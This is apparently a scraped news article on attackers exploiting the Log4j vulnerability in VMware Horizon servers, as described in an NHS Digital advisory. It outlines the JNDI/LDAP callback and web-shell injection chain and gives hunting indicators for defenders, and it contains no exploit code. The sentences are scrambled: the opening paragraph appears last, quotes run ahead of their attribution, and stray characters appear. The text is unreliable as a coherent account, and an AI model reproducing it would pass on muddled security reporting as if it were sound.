Microsoft and others have previously warned that APT actors linked to China, Iran, North Korea and Turkey have already pounced and are actively exploiting the Log4j security defect.
Using artifacts from the VMWare Horizon attacks, security experts are urging organizations to look for evidence of ws_TomcatService.exe spawning abnormal processes, or any powershell.exe processes containing ‘VMBlastSG’ in the command line. The NHS Digital team also cautioned that additional VMware systems may be vulnerable and affected organisations should regularly review the VMSA-2021-0028 security advisory. On the targeted VMware Horizon platform, which is used by enterprises to run virtual desktops and apps across the hybrid cloud, the Log4j vulnerability carries a 10-out-of-10 critical rating. VMWare has already shipped high-priority patches for numerous products affected by Log4j and previously acknowledged scanning attempts to identify signs of vulnerable installations. “The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware,” it added. “Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service,” according to the alert. The NHS Digital team believes the attacks are being used to establish persistence within affected networks and noted that the attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure. The warning comes almost exactly one month after the first disclosure of a Log4j remote code execution vulnerability that threatens major damage on the internet and heightens the urgency for enterprise defenders to find and fix the issue.Īccording to an advisory from NHS Digital, attackers are exploiting the critical vulnerability in the Apache Tomcat service embedded within VMware Horizon. Threat hunters in the U.K.’s National Health Service have raised an alarm for an unknown threat actor hitting vulnerable VMWare Horizon servers with exploits for the ubiquitous Log4j security flaw.
0 kommentar(er)
